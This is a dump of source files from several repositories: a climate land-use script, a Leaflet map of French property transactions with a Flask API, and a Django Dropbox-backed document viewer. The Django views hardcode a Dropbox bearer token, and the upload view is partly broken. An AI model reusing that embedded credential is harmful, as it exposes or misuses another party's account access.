axis=0)\n tmp_d = np.sum(luStretched * np.expand_dims(gc_lookup['PLCOV_MX'][nonUrban], axis=[1, 2]), axis=0)\n tmp[touchPix] = tmp_n[touchPix] / tmp_d[touchPix]\n\n ## Fix the pixels with URB == 1, replace random values between Q1 and Q2 over domain (non-urban)\n if removeUrban:\n replacePixels = np.logical_and(urb == 0, lu[-1, :, :] == 0)\n #tmp[urb == 1] = np.nanmedian(tmp[replacePixels])\n tmp_q = np.quantile(tmp[replacePixels], [qLow,qHigh])\n tmp[urb == 1] = np.random.uniform(tmp_q[0],tmp_q[1],size=tmp.shape)[urb == 1]\n\n ## Set values in clm file\n clm[gc_var].values = tmp\n print('Done for {}'.format(gc_var))\n\n ## Set URBAN and FR_PAVED to ISA, for consistency\n clm['URBAN'].values = clm['ISA'].values\n clm['FR_PAVED'] = clm['ISA'].copy()\n\n ## Write to file\n print(\"Writing COSMO-CLM domain with double counting fixed: {}\".format(clm_oFile))\n clm.to_netcdf('{}'.format(clm_oFile))\n"
},
{
"alpha_fraction": 0.4166666567325592,
"alphanum_fraction": 0.6527777910232544,
"avg_line_length": 13.399999618530273,
"blob_id": "aea0757e43e8bc4238be5e7e9317e472906bca73",
"content_id": "92496d8a923b898c3edaaf49fa14d9874bcb286c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "rasterio==1.1.4\nscipy==1.4.1\nnumpy==1.19.4\nxarray==0.15.1\npandas==1.0.5\n"
}
] | 4 |
ghyster/dvf | https://github.com/ghyster/dvf | 38169e2f3b7b8a1701440f1b660ee86360fbcd7b | 54f88117e3b033a3f4d189cb18340d773b979a87 | 0ca51063560ccb02596b5f02eba9299376252bbd | refs/heads/main | 2023-08-11T05:08:35.025645 | 2021-10-12T08:44:44 | 2021-10-12T08:44:44 | 416,249,362 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5314062833786011,
"alphanum_fraction": 0.5426084995269775,
"avg_line_length": 38.28094482421875,
"blob_id": "5fc45490f70afc5e87bb5466714d996874b28e5b",
"content_id": "6be9342a10dd29ec1f5644fc4ca20e5e5d7510b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 20008,
"license_type": "no_license",
"max_line_length": 238,
"num_lines": 509,
"path": "/static/js/dvf.js",
"repo_name": "ghyster/dvf",
"src_encoding": "UTF-8",
"text": "var iMap = (function() {\n\n var MIN_DATE = '2014-01-01'\n var MAX_DATE = '2020-12-31'\n var adresseAPI = 'https://api-adresse.data.gouv.fr/search/?q=';\n var layer = L.tileLayer('https://cartodb-basemaps-{s}.global.ssl.fastly.net/light_all/{z}/{x}/{y}.png',{\n\t\t\t attribution: '© <a href=\"http://www.openstreetmap.org/copyright\">OpenStreetMap</a> contributors, © <a href=\"http://cartodb.com/attributions\">CartoDB</a>'\n\t\t\t});\n\n var map;\n var features;\n var layers; \n var departements; \n var departementLayer; \n var communes;\n var communeLayer;\n var communesMappingPromise;\n var currentcommune;\n var sections;\n var sectionLayer;\n var parcelleLayer; \n var hiddenCommunes=[];\n var hiddenSections=[];\n var hiddenDepartements=[];\n\n var startDate = MIN_DATE\n var endDate = MAX_DATE\n\n var data_section;\n var data_mutation=[];\n var prix_m=[];\n var alllayers=[];\n\n var myStyle = { fillOpacity: 0, color: \"#000000\", weight: 2, opacity: 0.65 };\n var overStyle = { color: \"#000000\", fillColor: \"#92B4F4\", fillOpacity: 0.35, weight: 4, opacity: 0.65 };\n var mutationStyle = { fillOpacity: 0.50, weight: 2, color: \"#000000\", fillColor: \"#885053\" };\n \n function highlightDepartement(e) {\n var layer = e.target;\n overStyle.fillColor=\"#92B4F4\";\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetDepartement(e) {\n departementLayer.resetStyle(e.target);\n }\n\n function entrerDansDepartement(sonCode) {\n /*if (hiddenDepartements.length>0) {\n resetDepartement(hiddenDepartements[0].pop());\n }\n \n // Vide l'interface\n codeDepartement = sonCode;\n console.log('Nous entrons dans le département ' + codeDepartement);*/\n // Charge les communes\n return getCommunes(sonCode).then(afficherCommunesDepartement);\n }\n\n function entrerDansCommune(comCode) {\n return getSections(comCode).then(afficherSections);\n }\n\n function getCommunes(codeDepartement) {\n hiddenDepartements.push(alllayers[codeDepartement]);\n departementLayer.removeLayer(alllayers[codeDepartement]);\n return $.getJSON(`https://geo.api.gouv.fr/departements/${codeDepartement}/communes?geometry=contour&format=geojson&type=commune-actuelle`).then(function (communes) {\n \n // Pour Paris, Lyon, Marseille, il faut compléter avec les arrondissements\n if (['75', '69', '13'].includes(codeDepartement)) {\n return $.getJSON('/donneesgeo/arrondissements_municipaux-20180711.json').then(function (arrondissements) {\n var features = communes.features.filter(function (e) {\n return !(['13055', '69123', '75056'].includes(e.properties.code))\n })\n arrondissements.features.forEach(function (arrondissement) {\n if (arrondissement.properties.code.startsWith(codeDepartement)) {\n features.push(arrondissement)\n }\n })\n return {type: 'FeatureCollection', features: features}\n })\n }\n \n return {type: 'FeatureCollection', features: communes.features}\n })\n }\n\n function getCadastreLayer(layerName, codeCommune) {\n return communesMappingPromise.then(function (communesMapping) {\n var communesToGet = codeCommune in communesMapping ? communesMapping[codeCommune] : [codeCommune]\n return Promise.all(communesToGet.map(function (communeToGet) {\n return getRemoteJSON(`https://cadastre.data.gouv.fr/bundler/cadastre-etalab/communes/${communeToGet}/geojson/${layerName}`)\n })).then(function (featureCollections) {\n return {\n type: 'FeatureCollection',\n features: featureCollections.reduce(function (acc, featureCollection) {\n if (featureCollection && featureCollection.features) {\n return acc.concat(featureCollection.features)\n }\n \n return acc\n }, [])\n }\n })\n })\n }\n\n function getParcelles(codeCommune, idSection) {\n //console.log(idSection);\n return getCadastreLayer('parcelles', codeCommune).then(function (featureCollection) {\n return {\n type: 'FeatureCollection',\n features: _.chain(featureCollection.features)\n .filter(function (f) {\n return f.id.startsWith(idSection)\n })\n .sortBy('id')\n .value()\n }\n })\n }\n\n function getMutations(codeCommune, idSection, startDate, endDate) {\n //console.log(section);\n return getRemoteJSON(`/api/mutations3/${codeCommune}/${idSectionToCode(idSection)}`)\n .then(function (data) {\n return data.mutations.filter(function (m) {\n return m.date_mutation >= startDate && m.date_mutation <= endDate && m.id_parcelle.startsWith(idSection)\n })\n })\n }\n\n function getSections(codeCommune) {\n hiddenCommunes.push(alllayers[codeCommune]);\n communeLayer.removeLayer(alllayers[codeCommune]);\n return getCadastreLayer('sections', codeCommune).then(function (featureCollection) {\n var features = featureCollection.features\n var hasMultiplePrefixes = features.some(function (f) {\n return f.properties.commune !== codeCommune || f.properties.prefixe !== '000'\n })\n features.forEach(function (f) {\n if (!hasMultiplePrefixes) {\n f.properties.label = f.properties.code\n return\n }\n \n var labelPrefix = f.properties.commune === codeCommune ? f.properties.prefixe : f.properties.commune.substr(2)\n f.properties.label = `${labelPrefix} ${f.properties.code}`\n })\n return {type: 'FeatureCollection', features: features}\n })\n }\n\n function afficherCommunesDepartement(data){\n communes=data;\n if(communeLayer) map.removeLayer( communeLayer );\n if(sectionLayer) map.removeLayer( sectionLayer );\n if(parcelleLayer) map.removeLayer( parcelleLayer );\n communeLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n feature.id=feature.properties.code;\n alllayers[feature.id]=layer;\n layer.on({\n mouseover: highlightCommune,\n mouseout: resetCommune,\n click: enterCommune\n });\n }\n }).addTo(map);\n communeLayer.addData(communes);\n \n map.fitBounds(communeLayer.getBounds());\n /*hiddenDepartements.push(e.target.feature);\n map.removeLayer(e.target);*/\n }\n\n function enterDepartement(e) {\n //console.log(e.target.feature);\n \n var codedept=e.target.feature.properties.code;\n while (current = hiddenDepartements.pop()){ departementLayer.addData(current); }\n hiddenCommunes=[];hiddenSections=[];\n getCommunes(codedept).then(afficherCommunesDepartement);\n \n } \n \n function highlightCommune(e) {\n var layer = e.target;\n overStyle.fillColor=\"#BDCFB5\";\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetCommune(e) {\n communeLayer.resetStyle(e.target);\n }\n\n function afficherSections(data){\n sections=data;\n if(sectionLayer) map.removeLayer( sectionLayer );\n if(parcelleLayer) map.removeLayer( parcelleLayer );\n sectionLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n alllayers[feature.id]=layer;\n layer.on({\n mouseover: highlightSection,\n mouseout: resetSection,\n click: enterSection\n });\n }\n }).addTo(map);\n sectionLayer.addData(sections);\n \n map.fitBounds(sectionLayer.getBounds());\n /*hiddenCommunes.push(e.target.feature);\n map.removeLayer(e.target);*/\n }\n\n function enterCommune(e) {\n //console.log(e.target.feature);\n currentcommune=e.target;\n //while (current = hiddenCommunes.pop()){ communeLayer.addData(current); }\n //hiddenSections=[];\n getSections(e.target.feature.properties.code).then(afficherSections);\n } \n\n function highlightSection(e) {\n var layer = e.target;\n overStyle.fillColor=\"#70B77E\";\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetSection(e) {\n sectionLayer.resetStyle(e.target);\n }\n\n function highlightMutation(e) {\n //console.log(e.target.options);\n var layer = e.target;\n overStyle.fillColor=e.target.options.fillColor;\n layer.setStyle(overStyle);\n\n if (!L.Browser.ie && !L.Browser.opera && !L.Browser.edge) {\n layer.bringToFront();\n }\n }\n\n function resetMutation(e) {\n mutationStyle.fillColor=e.target.options.fillColor;\n e.target.setStyle(mutationStyle);\n }\n\n function enterMutation(e){\n \n //console.log(_.meanBy(prix_m[e.target.feature.id], (m) => m.prixm),data_mutation[e.target.feature.id]);\n prixm2=_(prix_m[e.target.feature.id])\n .groupBy('mutation_id')\n .map((prixm) => ({ valeur: _.meanBy(prixm,function(o) { return Number(o.prixm); }) }))\n .value();\n console.log(prixm2[0].valeur,prix_m[e.target.feature.id]);\n\n }\n\n function getColor(d) {\n return !isFinite(d) ? '#9332a8' :\n d > 5000 ? '#dd776e' :\n d > 4500 ? '#e2886c' :\n d > 4000 ? '#e79a69' :\n d > 3500 ? '#ecac67' :\n d > 3000 ? '#e9b861' :\n d > 2500 ? '#f5ce62' :\n d > 2000 ? '#d4c86a' :\n d > 1500 ? '#b0be6e' :\n d > 1000 ? '#94bd77' :\n d > 500 ? '#73b87e' :\n '#57bb8a';\n }\n\n function entrerDansSection(){\n // Une fois qu'on a la géographie et les mutations, on fait tout l'affichage\n \n var parcellesId = data_section.map(function (parcelle) {\n return parcelle.id_parcelle\n });\n parcellesId.unshift('id');\n parcellesId=_.uniq(parcellesId);\n _.forEach(parcellesId, function(value) {prix_m[value]=[];}); \n _.forEach(data_section, function(value,key) {data_mutation[value.id_mutation]=[];});\n _.forEach(data_section, function(value,key) {\n data_mutation[value.id_mutation].push(value);\n });\n \n _.forEach(data_section, function(value,key) {\n /*test=_(data_mutation[value.id_mutation]).map((prixm,cle) => ({ valeur: _.meanBy(prixm,function(o) { return Number(o.valeur_fonciere); }),surface: _.sumBy(prixm, function(o) { return Number(o.surface_reelle_bati); }), }))\n .value();\n */\n //console.log(_.meanBy(data_mutation[value.id_mutation],function(o) { return Number(o.valeur_fonciere); }),_.sumBy(data_mutation[value.id_mutation],function(o) { return Number(o.surface_reelle_bati); }));\n vf=_.meanBy(data_mutation[value.id_mutation],function(o) { return Number(o.valeur_fonciere); });\n su=_.sumBy(data_mutation[value.id_mutation],function(o) { return Number(o.surface_reelle_bati); });\n if(su==0){\n su=_.sumBy(data_mutation[value.id_mutation],function(o) { return Number(o.surface_terrain); });\n }\n if(isFinite(vf/su)){\n value.prixm=vf/su;\n prix_m[value.id_parcelle].push(value);\n }\n \n }); \n //console.log(data_mutation);\n parcelleLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n //console.log(feature);\n if(_.includes(parcellesId, feature.id)){\n //calcul de la moyenne par rapport au prixm² groupé par mutation\n prixm2=_(prix_m[feature.id])\n .groupBy('mutation_id')\n .map((prixm) => ({ valeur: _.meanBy(prixm,function(o) { return Number(o.prixm); }) }))\n .value();\n //console.log(prixm2,);\n if(prixm2.length==0){\n color='#9332a8';\n }else{\n color=getColor(prixm2[0].valeur);\n }\n mutationStyle.fillColor=color;\n layer.setStyle(mutationStyle);\n layer.on({\n mouseover: highlightMutation,\n mouseout: resetMutation,\n click: enterMutation\n });\n }\n } \n }).addTo(map);\n parcelleLayer.addData(parcelles);\n map.fitBounds(parcelleLayer.getBounds());\n parcelleLayer.bringToFront();\n \n //hiddenSections.push(e.target.feature);\n //map.removeLayer(e.target);\n \n }\n\n function enterSection(e) {\n //console.log(e.target.feature.properties);\n //e.target.setStyle({ fill: false });\n hiddenSections.push(alllayers[e.target.feature.id]);\n sectionLayer.removeLayer(alllayers[e.target.feature.id]);\n return Promise.all([\n // Charge la couche géographique\n getParcelles(currentcommune.feature.properties.code, e.target.feature.properties.id).then(function (data) {\n parcelles = data;\n }),\n // Charge les mutations\n getMutations(currentcommune.feature.properties.code, e.target.feature.properties.id, startDate, endDate).then(function (data) {\n data_section = data\n })\n ]).then(entrerDansSection);\n } \n \n function getRemoteJSON(url, throwIfNotFound) {\n return fetch(url).then(function (response) {\n if (response.ok) { return response.json()} \n if (response.status === 404 && !throwIfNotFound) { return } \n throw new Error('Impossible de récupérer les données demandées : ' + response.status)\n })\n }\n\n function idSectionToCode(idSection) {\n return idSection.substr(5, 5)\n }\n\n function autocompleteAdresse(){\n var inputValue = document.getElementById(\"rechercheadresse\").value;\n if (inputValue) {\n fetch(adresseAPI+inputValue)\n .then(function (response) {\n response.json().then(function (data) {\n responseAdresse(data);\n });\n });\n } else {\n document.getElementById(\"selectionadresse\").style.display = \"none\";\n }\n }\n\n function responseAdresse(response) {\n select = document.getElementById(\"selectionadresse\");\n if (Object.keys(response.features).length > 0) {\n \n select.style.display = \"block\";\n select.innerHTML=\"\";\n var ul = document.createElement('ul');\n select.appendChild(ul);\n response.features.forEach(function (element) {\n var li = document.createElement('li');\n var ligneAdresse = document.createElement('span');\n var infosAdresse = document.createTextNode(element.properties.postcode + ' ' + element.properties.city);\n ligneAdresse.innerHTML = element.properties.name;\n li.onclick = function () { /*selectAdresse(element);*/getSectionFromAdresse(element) };\n li.appendChild(ligneAdresse);\n li.appendChild(infosAdresse);\n ul.appendChild(li);\n });\n } else {\n select.style.display = \"none\";\n }\n }\n\n function getSectionFromAdresse(element){\n query = encodeURIComponent(JSON.stringify(element.geometry));\n return getRemoteJSON(`https://apicarto.ign.fr/api/cadastre/division?geom=${query}`)\n .then(function (data) {\n //console.log(data.features[0].properties);\n document.getElementById(\"selectionadresse\").style.display='none';\n var props=data.features[0].properties;\n var section = props.section.padStart(5, '0');\n\t\t\tvar code_dep = props.code_dep;\n\t\t\tvar code_com = props.code_com;\n entrerDansDepartement(code_dep).then(function(){\n\t\t\t\tentrerDansCommune(code_dep+code_com).then(function(){\n currentcommune=alllayers[code_dep+code_com];\n hiddenSections.push(alllayers[code_dep+code_com+section]);\n sectionLayer.removeLayer(alllayers[code_dep+code_com+section]);\n\t\t\t\t\treturn Promise.all([\n // Charge la couche géographique\n getParcelles(code_dep+code_com, code_dep+code_com+section).then(function (data) {\n parcelles = data;\n }),\n // Charge les mutations\n getMutations(code_dep+code_com, code_dep+code_com+section, startDate, endDate).then(function (data) {\n data_section = data\n })\n ]).then(entrerDansSection);\n \n });\n });\n });\n }\n // Public API\n return {\n map: map,\n features: features,\n layers: layers,\n getMap: function(){\n return map;\n },\n init: function(){\n \n map = L.map('map', {\n /*crs: crs,*/\n attributionControl: false,\n minZoom: 6,//minZoom: 10\n messagebox: false\n });\n\n layer.addTo(map);\n \n map.setView(L.latLng(47, 3),5);\n\n // Chargement des contours des départements\n $.getJSON(\"/donneesgeo/departements-100m.geojson\",\n function (data) {\n departements = data\n }\n ).then(function() {\n \n departementLayer = L.geoJSON([],{\n style: myStyle,\n onEachFeature: function(feature, layer){\n feature.id=feature.properties.code;\n alllayers[feature.id]=layer;\n layer.on({\n mouseover: highlightDepartement,\n mouseout: resetDepartement,\n click: enterDepartement\n });\n }\n }).addTo(map);\n departementLayer.addData(departements);\n });\n communesMappingPromise = getRemoteJSON('/donneesgeo/communes-mapping.json', true); \n //map.on('overlayadd', loadLayer);\n \n document.getElementById('rechercheadresse').addEventListener(\"input\", _.debounce(autocompleteAdresse,500), false); \n }\n};\n\n})();\n\n$(document).ready(function() {\n//$.cookie.json = true;\niMap.init();\n\n}); "
},
{
"alpha_fraction": 0.4636363685131073,
"alphanum_fraction": 0.6818181872367859,
"avg_line_length": 14.714285850524902,
"blob_id": "97b02538ba9d9b1f1b9bd508e61304a712949ddd",
"content_id": "89820838588554f1fb05303076a9351c83c09fca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 14,
"path": "/requirements.txt",
"repo_name": "ghyster/dvf",
"src_encoding": "UTF-8",
"text": "click==8.0.1\nFlask==2.0.1\ngreenlet==1.1.1\nitsdangerous==2.0.1\nJinja2==3.0.1\nMarkupSafe==2.0.1\nnumpy==1.21.2\npandas==1.3.3\nPyMySQL==1.0.2\npython-dateutil==2.8.2\npytz==2021.1\nsix==1.16.0\nSQLAlchemy==1.4.25\nWerkzeug==2.0.1\n"
},
{
"alpha_fraction": 0.6754098534584045,
"alphanum_fraction": 0.6901639103889465,
"avg_line_length": 36.367347717285156,
"blob_id": "96d405842222102777f03c19ac969a553a87f991",
"content_id": "379dea9fd5c85c81bb8b5ada290b435b5da6fffb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1831,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 49,
"path": "/app.py",
"repo_name": "ghyster/dvf",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, send_from_directory, jsonify\nimport json\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\npd.set_option('display.max_rows', 1000)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\npd.set_option('precision', 0)\n\napp = Flask(__name__, static_url_path='')\n\nconfig = pd.read_csv('config.csv', header=None)\nid = config[0][0]\npwd = config[0][1]\nhost = config[0][2]\ndb = config[0][3]\nengine = create_engine('mysql+pymysql://%s:%s@%s/%s?charset=utf8mb4'%(id, pwd, host, db))\n\[email protected]('/')\ndef root():\n\treturn app.send_static_file('index.html')\n\[email protected]('/css/<path:path>')\ndef send_css(path):\n\treturn send_from_directory('static/css', path)\n\n\[email protected]('/js/<path:path>')\ndef send_js(path):\n\treturn send_from_directory('static/js', path)\n\[email protected]('/donneesgeo/<path:path>')\ndef send_donneesgeo(path):\n\treturn send_from_directory('static/donneesgeo', path)\n\[email protected]('/api/dates2')\ndef dates():\n\tdateMin = pd.read_sql(\"\"\"SELECT min(date_mutation) as min FROM dvf \"\"\", engine)\n\tdateMax = pd.read_sql(\"\"\"SELECT max(date_mutation) as max FROM dvf \"\"\", engine)\n\treturn '{\"min\": \"' + str(dateMin['min'][0]) + '\", \"max\": \"' + str(dateMax['max'][0]) + '\"}' \n\[email protected]('/api/mutations3/<commune>/<sectionPrefixee>')\ndef get_mutations3(commune, sectionPrefixee):\n\tmutations = pd.read_sql(\"\"\"SELECT * FROM dvf WHERE code_commune = %(code)s AND section_prefixe = %(sectionPrefixee)s\"\"\", engine, params = {\"code\": commune, \"sectionPrefixee\" : sectionPrefixee})\n\tmutations = mutations.applymap(str) # Str pour éviter la conversion des dates en millisecondes.\n\tmutations = mutations.sort_values(by=['date_mutation', 'code_type_local'], ascending=[False, True])\n\tjson_mutations = '{\"mutations\": ' + mutations.to_json(orient = 'records') + '}'\n\treturn json_mutations"
}
] | 3 |
Sunil-Sonu/docviewer-backend | https://github.com/Sunil-Sonu/docviewer-backend | 900eb727602484dd7d7e56f8a7f4741b825fcd01 | 479389e7eae925e88c7d40d292e6b5a61c423afb | ff8c390062fd8f8c5066de0b8f7bb3ae5f935169 | refs/heads/master | 2020-06-05T02:06:08.750850 | 2019-06-17T04:26:13 | 2019-06-17T04:26:13 | 192,274,782 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7248677015304565,
"alphanum_fraction": 0.7354497313499451,
"avg_line_length": 30.5,
"blob_id": "28b9e2d93f6abe3a8735ca4a5187e8cec6aa8e77",
"content_id": "140a77b0bf546875c5bc4c456f317524c6c81d6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 12,
"path": "/docviewer/models.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nclass UserFolder(models.Model):\n creator = models.ForeignKey(User, on_delete=models.CASCADE)\n folderId = models.CharField(primary_key=True, max_length=50)\n folderPath = models.CharField(max_length=50)\n\n def __str__(self):\n return self.folderId\n"
},
{
"alpha_fraction": 0.8223350048065186,
"alphanum_fraction": 0.8223350048065186,
"avg_line_length": 27.14285659790039,
"blob_id": "3f4e9049dde8c0e71a15c2fb1890ac42f43af037",
"content_id": "b7ee52bbeb6a3663f68e73ea963286f48ad6f54c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 7,
"path": "/docviewer/admin.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib import admin\nfrom docviewer.models import UserFolder\n# Register your models here.\nadmin.site.register(UserFolder)\n"
},
{
"alpha_fraction": 0.6576025485992432,
"alphanum_fraction": 0.6650804281234741,
"avg_line_length": 48.59550476074219,
"blob_id": "29c84485ca80f5fa5fad443993e0b88d2136e558",
"content_id": "8501d6ea1415d257d55ce85fb80e4def7ea0a688",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4413,
"license_type": "no_license",
"max_line_length": 195,
"num_lines": 89,
"path": "/docviewer/views.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core.files.storage import default_storage\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom docviewer.models import *\n\nimport requests\nimport json\nimport uuid\n\n@csrf_exempt\ndef getFiles(request):\n if not request.user.is_authenticated:\n return JsonResponse({'status': 'Please login'}, status=401)\n filePath = request.GET['path'] if 'path' in request.GET else \"\"\n response = requests.post('https://api.dropboxapi.com/2/files/list_folder', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', 'Content-Type': 'application/json'}, data=json.dumps({\n \"path\": UserFolder.objects.get(creator=request.user).folderPath + filePath,\n \"recursive\": False,\n \"include_media_info\": False,\n \"include_deleted\": False,\n \"include_has_explicit_shared_members\": False,\n \"include_mounted_folders\": True,\n \"include_non_downloadable_files\": True\n}))\n return JsonResponse(response.json(), content_type = 'application/json')\n\n@csrf_exempt\ndef getDownloadLink(request):\n if not request.user.is_authenticated:\n return JsonResponse({'status': 'Please login'}, status=401)\n filePath = request.GET['path']\n response = requests.post('https://api.dropboxapi.com/2/files/get_temporary_link', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', 'Content-Type': 'application/json'}, data=json.dumps({\n \"path\": UserFolder.objects.get(creator=request.user).folderPath + filePath\n }))\n return JsonResponse(response.json(), content_type = 'application/json')\n\n@csrf_exempt\ndef uploadFile(request):\n if not request.user.is_authenticated:\n return JsonResponse({'status': 'Please login'}, status=401)\n file = request.FILES.getlist('fileData')\n filePath = path = request.POST['path'] if 'path' in request.GET else \"\"\n fs = FileSystemStorage(location='/media')\n file_name = fs.save(file.name, file)\n # TODO: Implement reading the file and uploading it.\n response = requests.post('https://content.dropboxapi.com/2/files/upload', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', \n 'Dropbox-API-Arg': '{\\\"path\\\": ' + UserFolder.objects.get(creator=request.user).folderPath + filePath + ',\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"',\n 'Content-Type': 'application/octet-stream'}, \n data=file)\n return JsonResponse({'success': file_name}, content_type = 'application/json')\n\n@csrf_exempt\ndef user_login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n if user:\n if user.is_active:\n login(request, user)\n return JsonResponse({'data': 'Success'}, content_type = 'application/json')\n else:\n return JsonResponse({'error_message': 'Your account is disabled.'}, status= 401)\n else:\n return JsonResponse({'error_message': 'Invalid Login Details'}, status= 401)\n return JsonResponse({'error_message': 'Invalid Login Request'}, status= 500)\n\n@csrf_exempt\ndef user_register(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n email = request.POST.get('email')\n password = request.POST.get('password')\n if username is None or email is None or password is None:\n return JsonResponse({'error_message': 'Please enter proper details'}, status=400)\n user = User.objects.create_user(username = username, email = email, password = password)\n if user:\n response = requests.post('https://api.dropboxapi.com/2/files/create_folder_v2', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', 'Content-Type': 'application/json'}, data=json.dumps({\n \"path\": \"/\" + uuid.uuid4().hex,\n \"autorename\": False\n }))\n if response.status_code == 200:\n UserFolder.objects.create(folderId=response.json()['metadata']['id'], creator=user, folderPath=response.json()['metadata']['path_display'])\n return JsonResponse({'message': 'Success'})\n else:\n user.delete()\n return JsonResponse({'error_message': 'Not a valid request'}, status=500)"
},
{
"alpha_fraction": 0.6646825671195984,
"alphanum_fraction": 0.6646825671195984,
"avg_line_length": 41.08333206176758,
"blob_id": "debcfa89b41b02beb15061610a2714e177534b06",
"content_id": "f61f0e861efc0ace00c0320015cd6ccfb0f15412",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 12,
"path": "/docviewer/routes/api.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from django.urls import re_path\nfrom django.views.decorators.csrf import csrf_exempt\nfrom docviewer import views\n\ndef getRoutes():\n return [\n re_path(r'getFiles$', views.getFiles, name = 'getFiles'),\n re_path(r'getDownloadLink$', views.getDownloadLink, name = 'getDownloadLink'),\n re_path(r'uploadFile$', views.uploadFile, name = 'uploadFile'),\n re_path(r'login$', views.user_login, name = 'login'),\n re_path(r'signup$', views.user_register, name = 'signup'),\n ];"
},
{
"alpha_fraction": 0.5566801428794861,
"alphanum_fraction": 0.623481810092926,
"avg_line_length": 23.700000762939453,
"blob_id": "d78fb6139863535ee84318e1b39ee9885b4f35c9",
"content_id": "2a95bc2605e98b91ba2639ffe6ba3fdbd868c320",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 494,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 20,
"path": "/docviewer/migrations/0003_userfolder_folderpath.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.2 on 2019-06-17 03:16\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('docviewer', '0002_auto_20190617_0308'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userfolder',\n name='folderPath',\n field=models.CharField(default=django.utils.timezone.now, max_length=50),\n preserve_default=False,\n ),\n ]\n"
}
] | 5 |
kamikazechaser/satrajit2_574b | https://github.com/kamikazechaser/satrajit2_574b | d2a42040cf5529b448bd5699d3399312646e76cd | 87558dd3e0f542065b51383746cb55d2109b386f | b4efbdd7cbe1834e9dc930f3874acaf8f7b1ba1e | refs/heads/master | 2020-08-11T09:33:18.223474 | 2019-10-12T08:42:13 | 2019-10-12T08:42:13 | 214,368,232 | 0 | 0 | null | 2019-10-11T07:10:28 | 2019-10-11T06:58:01 | 2019-10-11T06:58:00 | null | [
{
"alpha_fraction": 0.5863108038902283,
"alphanum_fraction": 0.5962117910385132,
"avg_line_length": 32.66666793823242,
"blob_id": "560b007a1daf076ce8048403530ce651e30a4d74",
"content_id": "acb0e7bb6a917e8e90e8932ce01a5ee5069f00df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2323,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 69,
"path": "/backend/moodx/api/ml/recommender/inference.py",
"repo_name": "kamikazechaser/satrajit2_574b",
"src_encoding": "UTF-8",
